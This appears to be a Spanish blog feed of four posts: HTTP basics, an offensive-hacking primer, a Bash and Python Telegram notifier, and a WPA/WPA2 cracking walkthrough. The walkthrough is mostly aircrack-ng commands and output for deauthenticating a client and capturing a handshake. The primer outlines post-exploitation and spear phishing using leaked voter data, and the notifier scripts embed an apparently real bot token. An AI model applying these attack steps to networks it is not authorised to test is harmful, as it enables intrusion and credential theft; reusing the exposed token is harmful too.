DEV Community: Vay3t

Protocolo HTTP — Comprendiendo las tecnologías Web

Vay3t — Sat, 09 Sep 2023 17:00:00 +0000

Que es el protocolo HTTP?

El protocolo HTTP (Hypertext Transfer Protocol) es un conjunto de reglas que permite la comunicación y el intercambio de información entre computadoras en la World Wide Web (la red de Internet).

El protocolo HTTP utiliza TCP (Protocolo de Control de Transmisión) porque TCP proporciona una comunicación confiable y orientada a la conexión. Esto significa que TCP garantiza la entrega de datos en el orden correcto y sin errores, lo cual es esencial para asegurar que las páginas web y otros recursos se carguen correctamente y sin problemas en los navegadores.

Diferencia entre HTTP y HTTPS

La principal distinción entre HTTP y HTTPS radica en la protección de la comunicación. Mientras HTTPS encripta y asegura la información transmitida, HTTP no lo hace, exponiendo los datos a riesgos y espionaje. Por ello, se aconseja emplear HTTPS en la medida de lo posible, sobre todo en páginas web que gestionan información delicada o privada.

Modelo de comunicación HTTP

El protocolo HTTP es un modelo de comunicación cliente — servidor utilizado en la web. El cliente, como un navegador web, envía solicitudes (Requests) a un servidor que aloja y administra recursos. El servidor procesa las solicitudes (Requests) y responde (Response) con la información o acciones solicitadas. Este modelo facilita el intercambio de información en la web, permitiendo una separación clara de responsabilidades entre clientes y servidores.

Esquema de conexión Cliente — Servidor

+-----------+                               +------------+
|           |        172.16.18.2:80         |            |
|           |  +------------------------->  |            |
|           |            Request            |            |
|  Cliente  |                               |  Servidor  |
|  Firefox  |                               |    Web     |
|           |      172.16.20.34:36894       |            |
|           |  <-------------------------+  |            |
|           |            Response           |            |
+-----------+                               +------------+
*172.16.20.34*                              *172.16.18.2*

Los puertos comunes usados en servidores web son los siguientes 80/81/443/8000/8080/8443/8888

Que servidores y clientes existen?

En el contexto de la web y el protocolo HTTP, hay varios servidores y clientes disponibles. Estos son algunos ejemplos de cada tipo:

Servidores web:

Apache HTTP Server: Un servidor web de código abierto muy popular y ampliamente utilizado.
Nginx: Un servidor web de alto rendimiento, también utilizado como proxy inverso y balanceador de carga.
Microsoft Internet Information Services (IIS): Un servidor web desarrollado por Microsoft, integrado en sus sistemas operativos Windows Server.
Caddy: Un servidor web moderno, escrito en Go, que se centra en la facilidad de uso y la seguridad. Incluye soporte automático para HTTPS utilizando Let’s Encrypt.
Tomcat: Un servidor web y contenedor de servlets Java desarrollado por la Apache Software Foundation. Tomcat se utiliza principalmente para desplegar aplicaciones web basadas en Java.
Gunicorn: Un servidor web WSGI para Python, utilizado para servir aplicaciones web basadas en Python, como aquellas creadas con Django o Flask.

Clientes web

Navegadores web: Como por ejemplo Google Chrome, Mozilla Firefox, Apple Safari, Microsoft Edge, Opera que permiten a los usuarios navegar por la web y acceder a recursos en línea.
Aplicaciones móviles: Muchas aplicaciones móviles actúan como clientes HTTP al solicitar y recibir información de servidores web. Algunos son Instagram, GMail, Whatsapp, Telegram, Uber, Netflix, y un sin fin…
Herramientas de línea de comandos: Programas como curl o wget que permiten enviar solicitudes HTTP desde la línea de comandos en un sistema operativo.
Bibliotecas y frameworks: Lenguajes de programación como Python, Java, JavaScript, entre otros, cuentan con bibliotecas y frameworks que permiten a los desarrolladores crear aplicaciones que funcionen como clientes HTTP.

Que es una URL?

Una URL (Uniform Resource Locator) es una dirección única que identifica un recurso en la web, como una página web, una imagen o un archivo. La URL especifica la ubicación del recurso y cómo acceder a él mediante protocolos como HTTP.

Estructura de una URL

Si descomponemos la estructura de una URL podríamos ordenarlo de la siguiente forma:

<protocolo>://<dominio>:<puerto><path><parametros>

http://vay3t.org:81/hello?name=nch&message=wspmdf

- protocolo = http
- dominio = vay3t.org
- puerto = 81
- path = /hello
- parametros = ?name=nch&message=wspmdf
  - variables = name,message
  - valores = nch,wspmdf

Estructura del protocolo

Ya, pero que significa todo esto?

Los headers, verbos/métodos, códigos de estados y MIME types son componentes importantes en la comunicación basada en el protocolo HTTP.

Request

Verbo/Método
Path
Versión del estándar HTTP
Navegador Web Cliente
Idioma cliente
Headers

Response

Versión del estándar HTTP
Status code
Versión del servidor (ahí podría ir Apache/1.1 o cosas así)
Largo del contenido del response
Cuerpo del response

Un poco de detalle… (Modo: DEBUG)

A continuación, se explica brevemente cada uno de estos componentes:

Webs modernas, las APIs

Backend y frontend

El backend y el frontend son dos componentes principales en el desarrollo de aplicaciones web y móviles. Ambos trabajan juntos para ofrecer una experiencia completa al usuario.

Frontend: Es la parte visible e interactiva de la aplicación, con la que el usuario interactúa directamente. El frontend se encarga de la presentación y la interacción, utilizando tecnologías como HTML, CSS y JavaScript. Su principal objetivo es proporcionar una interfaz atractiva y fácil de usar.
Backend: Es la parte oculta que gestiona la lógica de negocio, el procesamiento de datos y la comunicación con bases de datos o servicios externos. El backend suele estar compuesto por servidores, bases de datos y APIs. Los lenguajes de programación comunes para el backend incluyen Python, Java, Ruby, PHP y Node.js.

REST / SOAP

REST y SOAP son dos protocolos ampliamente utilizados en la comunicación entre sistemas, particularmente en el desarrollo de servicios web, específicamente a nivel de backend.

REST (Representational State Transfer) es un estilo arquitectónico basado en HTTP que utiliza verbos comunes como GET, POST, PUT y DELETE para realizar operaciones en recursos identificados por URLs. Utiliza una estructura JSON (presentado en la imagen anterior a la izquierda).

SOAP (Simple Object Access Protocol) es un protocolo basado en XML (presentado en la imagen anterior a la derecha) diseñado para mejorar la comunicación y la interoperabilidad entre sistemas, puede ser usado en servicios web. Permite a las aplicaciones intercambiar información de manera estandarizada.

Los dos cumplen el mismo objetivo que es estandarizar las comunicaciones para interactuar con el backend web, con la diferencia que actualmente es más usado REST por ser más ligero, simple y fácil de implementar que SOAP.

Estilos arquitectónicos existentes

Conceptos a entender

Un endpoint es una dirección URL en un servicio web o API que permite enviar solicitudes y recibir respuestas. Actúa como punto de entrada para interactuar con funciones o recursos específicos y se identifica mediante un método HTTP y una URL única.

La documentación de una API es un conjunto de recursos e información que explica cómo utilizar e interactuar con la API, incluyendo detalles sobre autenticación, endpoints, ejemplos de código y manejo de errores (presentado en la imagen anterior al medio). Es esencial para que los desarrolladores puedan integrarla eficientemente en sus aplicaciones.

Usando la terminal

HTTPBin es un proyecto de código abierto que proporciona un conjunto de endpoints para realizar pruebas y depurar clientes HTTP. Es una API RESTful que ofrece varios endpoints para realizar diferentes tipos de solicitudes HTTP y analizar sus respuestas.

postmanlabs / httpbin

HTTP Request & Response Service, written in Python + Flask.

httpbin(1): HTTP Request & Response Service

A Kenneth Reitz Project.

Run locally:

docker pull kennethreitz/httpbin
docker run -p 80:80 kennethreitz/httpbin

See http://httpbin.org for more information.

Officially Deployed at:

Build Status

View on GitHub

cURL

cURL es una herramienta de línea de comandos y biblioteca que permite transferir datos a través de diversos protocolos. Se utiliza principalmente para realizar solicitudes HTTP, acceder a APIs, depurar y automatizar procesos en aplicaciones web. Es compatible con múltiples plataformas y sistemas operativos, y su biblioteca está disponible en varios lenguajes de programación.

Comando (request)

curl -i https://httpbin.org/post -X POST -d "name=nch&message=wspmdf"

Response

HTTP/2 200
date: Wed, 12 Apr 2023 05:34:40 GMT
content-type: application/json
content-length: 454
server: gunicorn/19.9.0
access-control-allow-origin: *
access-control-allow-credentials: true

{
  "args": {},
  "data": "",
  "files": {},
  "form": {
    "message": "wspmdf",
    "name": "nch"
  },
  "headers": {
    "Accept": "*/*",
    "Content-Length": "23",
    "Content-Type": "application/x-www-form-urlencoded",
    "Host": "httpbin.org",
    "User-Agent": "curl/7.81.0",
    "X-Amzn-Trace-Id": "Root=1-643642f0-1ac9239a66e04bc20b27036a"
  },
  "json": null,
  "origin": "x.x.x.x",
  "url": "https://httpbin.org/post"
}

Con un poco de Bash se pueden hacer muchas cosas como lo que escribí en un post anterior:

Creando un notificador en Telegram con Bash

Vay3t ・ Aug 26

#telegram #bash #python #notificador

Conclusión

Objetivo en la seguridad ofensiva

La importancia de entender el protocolo HTTP desde una perspectiva del atacante te permitirá identificar y explotar con mayor facilidad y efectividad proyectos web, realizando ataques sofisticados y personalizados, logrando de esta forma un mayor impacto.

Mucho texto, a mimir

Autores

NCH & OpenAI

WTF es el Hacking?

Vay3t — Sat, 02 Sep 2023 18:00:00 +0000

WTF es un Hacker? (Opinión del autor)

Hacker es un título que te lo dan las mismas personas o la comunidad, por tus logros y/o habilidades en la materia. Autoproclamarse Hacker sin estas características es caer en la arrogancia. Además, ningún Hacker se llama así mismo Hacker.

Pentesting

Una prueba de penetración, o pentest, es un ataque a un sistema informático con la intención de encontrar las debilidades de seguridad y todo lo que podría tener acceso a ella, su funcionalidad y datos. [Fuente: Wikipedia]

Ciclo de vida de un ataque

Reconocimiento: Es la primera fase de un ataque, en donde se obtiene información superficial del sistema o arquitectura a atacar, como descubrimiento de hosts, dominios y/o páginas web de cualquier objetivo el cual pueda ser atacado. Debemos Identificar los lenguajes de programación en el que está programado la página web que se va a atacar.
Enumeración: En esta fase se identifica qué función cumple y qué tipo de servicios corren en el servidor u objetivo. También obtenemos el tipo de sistema operativo y versiones de puertos por medio de escaneos, en caso de las páginas web identificar las versiones de las tecnologías usadas. Todo esto con el fin de encontrar vulnerabilidades.
Explotación: Luego de obtener información suficiente del sistema a atacar y también sus versiones, se buscan las posibles vulnerabilidades existentes, junto con eso se buscan los exploits o se fabrican pruebas de concepto para así explotar la vulnerabilidad (aprovechar el bug) y sacar provecho de ello.
Post-Explotación: Ya cuando estás dentro del sistema, después de haber explotado las vulnerabilidades que te permitan hacerlo, necesitas ganar acceso persistente en el sistema para luego capturar las contraseñas guardadas, obtener llaves de acceso, acceso a la red interna de un servidor expuesto en internet, aprovechar los recursos del servidor para beneficio propio como ataques de denegación de servicio, phishing, y por último después de hacer todo esto se realiza un borrado de huellas.

Tipos de pentestings

Black Box: Es el tipo de pentesting donde no tienes información previa del objetivo (target).
Grey Box: Cuando tienes cuentas de usuario del objetivo (target) el cual facilita la explotación interna cuando empiezas a realizar el ataque.
White Box: Significa que tienes información de la infraestructura o el código fuente del objetivo (target) al iniciar el pentesting.

Inteligencia en el ataque

Es la información que obtienes y de cómo le puedes sacar provecho a ello.

Ejemplo práctico: Existe un formulario en una página web donde puedes poner un RUT/DNI y te devuelve un correo.
Acción criminal: En Chile, años atrás, el Servel de vez en cuando liberaba la información de todas las personas mayores de 18 (Nombre, RUT, sexo, dirección, comuna). Entonces tú al consultar el RUT asumes que te devuelve el correo del respectivo RUT. Además, el RUT es un entero de 7 a 8 dígitos más un dígito verificador, este dígito verificador es una fórmula conocida, por lo cual no es necesario conocerlo. Conociendo el correo de una persona es posible realizar un spear phishing aprovechando la información del Servel.

Phishing

Se produce un ataque de suplantación de identidad (phishing) cuando alguien trata de conseguir que reveles información personal en línea.

¿Cómo suele hacerse la suplantación de identidad?

Por lo general, la suplantación de identidad se realiza por correo electrónico, anuncios o sitios que tienen un aspecto similar a los que usas. Por ejemplo, alguien que te envía un correo electrónico que parece proceder de tu banco para que le des información sobre tu cuenta bancaria. Los correos electrónicos o sitios de suplantación de identidad podrían solicitar lo siguiente:

Nombres de usuario y contraseñas, incluidos los cambios de contraseña
Números de identificación personal Números de cuentas bancarias
PIN (Números de identificación personal)
Números de tarjetas de crédito
Apellido de soltera de tu madre
Tu fecha de nacimiento

Fuente: https://support.google.com/mail/answer/8253?hl=es-419

Para atacar al enemigo debes conocerlo

Una forma efectiva de poder tener mejores nociones de seguridad y entender mejor cómo atacar un sistema, es usar la tecnología o haber programado en tal lenguaje, por ejemplo, para saber cómo atacar mejor un Wordpress, es conocimiento útil ya haber instalado y configurado anteriormente el CMS porque sabes cómo está estructurado.

Cómo funciona la red e internet

Al acceder a una página web, tu sistema operativo utiliza al navegador como cliente, el cual se conecta al del dominio o dirección IP e interpreta el servicio que provee el servidor.

MAC address: La dirección MAC (siglas en inglés de Media Access Control) es un identificador único de 6 bloques de dos caracteres hexadecimales de una tarjeta o dispositivo de red. Se la conoce también como dirección física, y es única para cada dispositivo. Ej: 1A:2B:CB:D4:EE:F6
IP address: La dirección IP es un conjunto de números que identifica, de manera lógica y jerárquica, a una interfaz en red de un dispositivo. Ej: 1.1.1.1, 255.255.255.0
IP privada: Es la IP que te asigna el router para poder navegar de forma interna en la red local.
IP pública: Es la IP que es accesible desde cualquier lugar del mundo desde un proveedor de servicios de internet.
puerto: Es el número de identificación de un servicio en concreto. Cada host tiene disponible 65536 puertos enumerados desde el 0 al 65535. Cuando estableces conexión con un servidor es fundamental que el servidor tenga un puerto disponible para su entrada. Cuando te conectas a una página web, el cliente que vendría siendo el navegador, se conecta al puerto 80 o 443 del servidor. Pero también ocurre otra cosa, cuando te conectas a un servidor, el cliente usa un puerto que es superior al 1024 para conectarse a él. Más abajo existe un ejemplo gráfico de cómo funciona. Existen puertos conocidos como los siguientes:
- ftp: 21
- ssh: 22
- http: 80
- https: 443

Algunos conceptos necesarios para seguir entendiendo las redes son:

router: El artefacto que está en tu casa que permite que tengas internet y esté todo conectado a la misma red.
red local (LAN): Por dar un ejemplo es la red del router de tu casa, no del internet en general, solo de tu casa.
wifi: Protocolo de conexión inalámbrica a la red.
ethernet: Conexión por cable a la red.
host: Es un dispositivo como computadora, laptop, teléfono inteligente, servidor, que esté conectado a la red.
cliente-servidor: Un cliente realiza peticiones a otro host, el servidor, quien le da la respuesta de esa petición.
dominio: Es la traducción de una IP a un nombre, usualmente este está compuesto por 2 partes, el nombre y el tld. Ej: midominiounicoyespecial.com (dominio.tld)
subdominio: Es una subdivisión del dominio. Se compone por 3 partes, el nombre de la subdivisión, el nombre del dominio, y el tld. Ej: subdom.midom.com

Esquema de conexión Cliente — Servidor

+-----------+                               +------------+
|           |        172.16.18.2:80         |            |
|           |  +------------------------->  |            |
|           |                               |            |
|  Cliente  |                               |  Servidor  |
|  Firefox  |                               |    web     |
|           |      172.16.20.34:36894       |            |
|           |  <-------------------------+  |            |
|           |                               |            |
+-----------+                               +------------+
*172.16.20.34*                              *172.16.18.2*

Protocolos de internet

TCP y UDP son dos protocolos fundamentales para las comunicaciones a través de Internet.

TCP (Transmission Control Protocol) es un protocolo orientado a la conexión, lo que significa que antes de enviar datos, se establece una conexión entre dos dispositivos. Es un protocolo confiable que garantiza que los datos se transmitan de manera segura y completa a través de la red. TCP incluye mecanismos de retransmisión de paquetes perdidos, control de flujo y control de congestión. Es ampliamente utilizado en aplicaciones que requieren una transmisión de datos precisa y confiable, como correo electrónico, transferencias de archivos y transacciones bancarias en línea.

UDP (User Datagram Protocol) es un protocolo sin conexión, lo que significa que los dispositivos no necesitan establecer una conexión antes de transmitir datos. Es un protocolo más rápido y eficiente que TCP, ya que no incluye los mecanismos de control de errores y congestión. UDP es utilizado principalmente en aplicaciones donde la velocidad es más importante que la precisión, como juegos en línea, transmisiones de video en vivo y voz sobre IP.

En resumen, la principal diferencia entre TCP y UDP es que TCP es un protocolo orientado a la conexión y confiable, mientras que UDP es un protocolo sin conexión y no confiable pero más rápido. La elección del protocolo depende de las necesidades específicas de la aplicación y la red en la que se utiliza.

Software y lenguajes de programación

El software es un conjunto de programas que se ejecutan en un ordenador o dispositivo electrónico, dividido en software de sistema y software de aplicación. Algunos lenguajes de programación son los siguientes:

C/C++ en el hacking es usado para la creación de backdoors que pueda evadir AV/EDR o exploits de escalada de privilegios local. Es un lenguaje difícil de aprender y de bajo nivel.
Python es un lenguaje de programación de alto nivel, fácil de leer y escribir. En el hacking se usa para casi cualquier cosa, desde servidores para recibir conexiones en casi todos los protocolo, desarrollo de exploits por lo general webs y Buffer Overflows, herramientas de redes, bots de Telegram, análisis estático de binarios, automatización de enumeración/ataques y así podría seguir hasta aburrirlos.
Go es tan flexible como Python, pero requiere un poco más de esfuerzo para aprender debido a su nivel de dificultad ligeramente superior. La gracia de este lenguaje es el fácil manejo de concurrencia y la compilación cruzada.
Javascript es un lenguaje de programación esencial para el desarrollo web moderno. También existe su formato Backend que es NodeJS y su derivado Typescript. Muchos sitios están en Javascript tanto Frontend como Backend por lo cual siempre es útil conocerlo.
Bash es un lenguaje de programación utilizado en sistemas operativos *Nix (Unix y Linux) para automatizar tareas mediante scripts y para interactuar con el sistema operativo mediante la línea de comandos, da mayor flexibilidad para realizar funciones de administración de sistema operativo, por lo que tienes un mayor control del sistema operativo por lo cual optimiza los tiempos de programación usando más recursos.
PowerShell permite a los usuarios interactuar con el sistema operativo de Windows mediante la línea de comandos, y también permite la automatización de tareas mediante la escritura de scripts. En el hacking sirve para vulnerar Windows más fácilmente.
Java es un lenguaje de programación popular y versátil utilizado en una amplia variedad de aplicaciones de software. Sirve para desarrollar módulos para Burpsuite y es ampliamente usado por lo que se recomienda aprenderlo para entender como funciona las tecnologías.
Rust puede ser considerado el reemplazo moderno y seguro de C/C++, aun así el compilador de Rust ocupa gcc. Es usado para backdoors que evadan AV/EDR y herramientas de post-explotación como volcador de memoria y herramientas de red.

Lenguajes compilados, interpretados y administrados

Los lenguajes de programación se dividen en tres categorías: compilados, interpretados y administrados. Los lenguajes compilados traducen el código a lenguaje de máquina antes de la ejecución, mientras que los lenguajes interpretados lo hacen en tiempo de ejecución. Los lenguajes administrados utilizan una máquina virtual para ejecutar el código en lenguaje de bajo nivel. C/C++, Go, Rust y C# son compilados, Python, Javascript, Bash y PowerShell son interpretados, y Java con C# son administrados.

Lenguajes recomendados

Los lenguajes que sirven para temas de hacking y seguridad ofensiva de propósitos generales son: Python, Bash, Go, C/C++ en ese orden de importancia dado a que con esto tendrás la suficiente libertad para ser independiente de las herramientas creadas o tener la suficiente flexibilidad de modificarlas y mejorarlas. Un plus seria aprender PowerShell y C# para la explotación de redes Microsoft.

Conclusión

En el area del hacking es fundamental contar con sólidos conocimientos en redes, sistemas operativos y programación, ya que al ser multidisciplinario proporciona las herramientas necesarias para destacar en la mayoría de las áreas. En esta disciplina es necesario la habilidad, versatilidad, creatividad y genialidad del adversario, capaz de resolver problemas informáticos para lograr vulnerar el componente objetivo usando solo el conocimiento actual a la fecha, sus herramientas e Internet.

Creando un notificador en Telegram con Bash

Vay3t — Sat, 26 Aug 2023 18:00:00 +0000

¿En que consistirá el notificador?

Crearemos una herramienta la cual enviará un mensaje a un bot de Telegram creado y configurado por nosotros, de esta forma nos notificará ante algún evento que nosotros hallamos programado.

Se creará una herramienta en dos modalidades, como función para usarlo en ~/.bashrc y como herramienta de línea de comandos que estará ubicado en /usr/bin/.

Creando y configurando el bot con BotFather

Antes que nada necesitamos buscar el bot BotFather que nos ayudará a crear y administrar nuestros bots dándonos un token para poder usarlos.

En el bot se pueden usar las siguientes opciones:

Para añadir nuestro bot tenemos que usar el comando /newbot, luego colocarle un título y un nombre de usuario para poder identificarlo entre todos los usuarios y bots existentes. Luego de eso nos dará el link para acceder al chat del bot y un API token para trabajar e interactuar con él.

Programando el bot

Ya creado el bot, accedemos a su chat desde el link entregado luego de configurarlo y damos a /start.

Para hacer funcionar la herramienta es necesario saber nuestro id de chat (id de usuario de Telegram) que sirve para poder identificar qué usuario está interactuando con el bot. Para eso enviamos un mensaje de prueba al bot.

A continuación debemos obtener id del chat, con el siguiente link:

https://api.telegram.org/bot<YourBOTToken>/getUpdates

Este es un ejemplo de cómo obtener el dato necesario usando curl:

curl https://api.telegram.org/bot1318386267:AAHOq8X5lqpjkWfPnXJh3etK8JyDKt1YNCI/getUpdates -s | jq

El campo id es nuestro identificador de chat, que será necesario para que nos lleguen las notificaciones a nuestra cuenta.

Este trozo de código tiene que ser añadido al final del archivo ~/.bashrc:

function urlencode() {
        # urlencode <string>
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

function urldecode() {
        # urldecode <string>
        local url_encoded="${1//+/ }"
        printf '%b' "${url_encoded//%/\\x}"
}

function pusher(){
        token="1318386267:AAHOq8X5lqpjkWfPnXJh3etK8JyDKt1YNCI"
        id="202499999"
        msj=$@
        if [ "$msj" == "" ]; then
                if [ ! -t 0 ]; then
                        msj=$(cat /dev/stdin)
                else
                        msj="beep"
                fi
        fi
        msj=$(urlencode "$msj")
        url="https://api.telegram.org/bot$token/sendMessage"
        curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
        if [ $? -ne 0 ]; then
                echo "Error with bot"
        fi
}

source ~/.bashrc

Luego se ejecuta desde la terminal usando el nombre de la función pusher. Tenemos tres formas de ejecutar:

STDIN. $ echo test text | pusher
Input por argumentos. $ pusher test text
Sin argumentos. $ pusher

Casos de uso

Es importante tener en cuenta para qué usaremos esta herramienta y las limitaciones que tendremos. Acomodé el script para que pueda ser usado como herramienta, independiente del ~/.bashrc, para casos particulares en los cuales no se pueda usar el recurso desde ahí, por ejemplo cuando ejecutamos una tarea programada en el crontab o usamos xargs, parallel o cuando ejecutamos dentro de un script en Bash:

notify.sh

Herramienta que se usa en línea de comandos para notificar por Telegram.

#!/bin/bash

function urlencode() {
        # urlencode <string>
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

function urldecode() {
        # urldecode <string>
        local url_encoded="${1//+/ }"
        printf '%b' "${url_encoded//%/\\x}"
}

token="1318386267:AAHOq8X5lqpjkWfPnXJh3etK8JyDKt1YNCI"
id="202499999"
msj=$@
if [ "$msj" == "" ]; then
        if [ ! -t 0 ]; then
                msj=$(cat /dev/stdin)
        else
                msj="beep"
        fi
fi
msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
        echo "Error with bot"
fi

Luego damos permiso de ejecución al script y lo movemos a /usr/bin/notify.sh:

chmod +x notify.sh
sudo mv notify.sh /usr/bin/notify.sh

Ejemplos

Bug bounty y pentesting para poder identificar si un ataque fue efectivo o no usando un if con los estados de salida de Bash ($?) y enviando la salida del comando al bot. En caso de querer realizar un comando de una línea es posible usar el operador booleano and (&&) y or (||).

Ejemplo para notificar cada dominio existente en cada mensaje.

cat doms.txt | xargs -P7 -I@ "host @ && echo @ | notify.sh"

Ejemplo para notificar todos los dominios existentes en un solo mensaje.

#!/bin/bash

while read line; do
    host $line 
done < doms.txt | pusher

Crontab, útil para tener un seguimiento de las tareas programadas que se estén llevando a cabo.

Al ejecutar crontab -e se despliega una pantalla donde uno puede programar tareas para que se ejecuten cada cierto tiempo o a una cierta hora. Un ejemplo para aplicar el notificador es el siguiente:

Ejemplo con tarea en crontab revisando un portal cada una hora.

0 * * * * curl http://evil.corp && echo hola || notify.sh problemas con el portal $(date)

Control de logs, en algunas ocasiones es necesario saber qué pasa por nuestro servidor para eso diseñamos un script que envía los resultados al bot en tiempo real.

hotreader.sh

Script que envía notificaciones con las líneas añadidas de un archivo en tiempo real.

#!/bin/bash

file=$1; text=$2
if [ "$text" == "" ]; then text="."; fi

lines=$(cat $file | wc -l)
#while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do 
    linesNow=$(cat $file | wc -l)
    tail -n $(($linesNow-$lines)) $file | grep $text | notify.sh
    lines=$linesNow
done

Modo de uso:

bash hotreader.sh <TEXTFIlE> <PATTERN>

Leer logs DNS:

Herramienta que notifica las consultas DNS realizadas al servidor.

bash hotreader.sh /var/log/named/query.log custom-domain.org

Conclusión

Esta herramienta que creamos prueba la versatilidad y utilidad de un lenguaje como Bash, que en conjunto con una herramienta como BotFather, puede utilizarse para todo tipo de tareas y en varias áreas. El notificador se puede usar para monitorear todo tipo de tareas, por ejemplo, tales como A, B y C. Lo único que se requiere para expandir los límites de la herramienta es tiempo y creatividad.

Bash le pone.

Bonus track

Telegram Hot reader en Python:

#!/usr/bin/python3

import os.path
import sys
import urllib.request
import urllib.parse

# sudo pip3 install pyinotify
import pyinotify


# Usage
# python3 notifier.py <TextFile>

global lines

file_watcher = os.path.realpath(sys.argv[1])

def count_lines(file_name):
    with open(file_name) as f:
        count = len(f.readlines())
    return count

def tail_n(file_name, n):
    with open(file_name) as f:
        lines = f.readlines()
    return lines[-n:]

def list2string(list):
    return "".join(list)

def sender(msj):
    if msj == "":
        msj = "[HotReader]"

    token = "<TOKEN_BOT>"
    chat_id = "<CHAT_ID>"

    url = f"https://api.telegram.org/bot{token}/sendMessage"

    values = {
        "chat_id": chat_id,
        "text": "[HotReader] " + msj
    }

    data = urllib.parse.urlencode(values)
    data = data.encode('ascii')
    req = urllib.request.Request(url, data)
    urllib.request.urlopen(req)


# Example: monitors transient files.
#
# Run this code, then run transient_file.sh in another shell.


class ProcessTransientFile(pyinotify.ProcessEvent):

    def process_IN_MODIFY(self, event):
        global lines
        # We have explicitely registered for this kind of event.
        #print('\t', event.pathname, ' -> written')
        lines_now = count_lines(file_watcher)
        modified = tail_n(file_watcher, lines_now - lines)
        print(list2string(modified))
        lines = lines_now
        sender(list2string(modified))


    def process_default(self, event):
        # Implicitely IN_CREATE and IN_DELETE are watched too. You can
        # ignore them and provide an empty process_default or you can
        # process them, either with process_default or their dedicated
        # method (process_IN_CREATE, process_IN_DELETE) which would
        # override process_default.
        print('default: ', event.maskname)


lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# In this case you must give the class object (ProcessTransientFile)
# as last parameter not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()

Hacking Wi-Fi 3: Crackeando WPA/WPA2 con aircrack-ng

Vay3t — Sat, 19 Aug 2023 18:00:00 +0000

Crackeando contraseñas WPA/WPA2 con aircrack-ng usando fuerza bruta.

¿Qué es WPA/WPA2?

Wi-Fi Protected Access es un sistema de cifrado que apareció para corregir las vulnerabilidades de la WEP, fue diseñado para usar un servidor de autenticación (RADIUS) que distribuye claves diferentes a cada usuario. Pero también se puede usar en una forma menos segura una contraseña precompartida, donde distintos usuarios pueden usar la misma para poder autenticarse.

Crackeando WPA/WPA2

El crackeo de la WPA/WPA2 consta de 4 pasos, el primero es colocar la tarjeta en modo monitor, el segundo es seleccionar el router de la víctima que tenga algún cliente conectado, el tercero es capturar el tráfico generado por el router víctima mientras se hace un ataque de desautenticación al cliente conectado, esperamos a que el cliente se vuelva a conectar otra ves para capturarle el handshake (el handshake es lo que nos sirve para poder romper la contraseña) y el último paso es usar aircrack-ng y un diccionario (lista de contraseñas posibles en formato txt) para poder romper la contraseña. Actualmente es la más usada.

Colocando la tarjeta en modo monitor

sudo airmon-ng start wlan1

Seleccionando una víctima

Cuando usamos el siguiente comando airodump-ng wlan1mon lo que hacemos es usar la tarjeta en modo monitor para poder identificar las redes Wifi existentes.


root@vay3t:~# airodump-ng wlan1mon 

 CH  5 ][ Elapsed: 0 s ][ 2017-10-30 18:22

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:56:27:DD:4F:63  -33        2        0    0   6  54   WPA2 CCMP   PSK  c1sc0
 C0:05:C2:C2:04:B1  -71        2        0    0   7  54e. WPA2 CCMP   PSK  Movistar

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C0:56:27:DD:4F:63   30:A8:DB:F1:66:82  -30    0 - 1      0        3

Nos damos cuenta de que el router c1sc0 tiene ENC WPA2 con un cliente conectado lo que significa que nos interesa.

Capturando el handshake

Ya que hemos seleccionado nuestra víctima tenemos que capturar mientras realizamos el ataque de desautenticación con aireplay-ng para poder capturar el handshake

root@vay3t:~# airodump-ng wlan1mon --bssid C0:56:27:DD:4F:63 --channel 6 -w outout

 CH  6 ][ Elapsed: 2 mins ][ 2017-10-30 18:28 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 C0:56:27:DD:4F:63   -6 100        0        0    0   6  54   WPA2 CCMP   PSK  c1sc0

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 C0:56:27:DD:4F:63  30:A8:DB:F1:66:82    0    1 - 1     0         0  c1sc0

Mientras tenemos airodump-ng corriendo usaremos otra ventana para poder realizar el ataque de desautenticación. Lo que hace el ataque de desautenticación es botar al cliente para que vuelva a ingresar al router y de esa forma capturar el handshake

root@vay3t:~# aireplay-ng wlan1mon -0 4 -a C0:56:27:DD:4F:63 -c 30:A8:DB:F1:66:82
18:27:56  Waiting for beacon frame (BSSID: C0:56:27:DD:4F:63) on channel 6
18:27:57  Sending 64 directed DeAuth. STMAC: [30:A8:DB:F1:66:82] [ 0|60 ACKs]
18:27:58  Sending 64 directed DeAuth. STMAC: [30:A8:DB:F1:66:82] [ 0|59 ACKs]
18:27:58  Sending 64 directed DeAuth. STMAC: [30:A8:DB:F1:66:82] [ 0|69 ACKs]
18:27:59  Sending 64 directed DeAuth. STMAC: [30:A8:DB:F1:66:82] [ 6|51 ACKs]

-0 4: También usado como --deauth 4 lo que hace es seleccionar el ataque deauth y enviar 4 paquetes con este ataque para poder botar al cliente
-a C0:56:27:DD:4F:63: Se usa para poder especificar el router víctima
-c 30:A8:DB:F1:66:82: Se utiliza para poder especificar al cliente a quien vamos a botar

Este ataque se hace cuantas veces sea necesario hasta capturar el handshake. Luego de un rato nos damos cuenta que aparece esto en la ventana del airodump-ng: [ WPA handshake: C0:56:27:DD:4F:63

root@vay3t:~# airodump-ng wlan1mon --bssid C0:56:27:DD:4F:63 --channel 6 -w outout

 CH  6 ][ Elapsed: 2 mins ][ 2017-10-30 18:28 ][ WPA handshake: C0:56:27:DD:4F:63

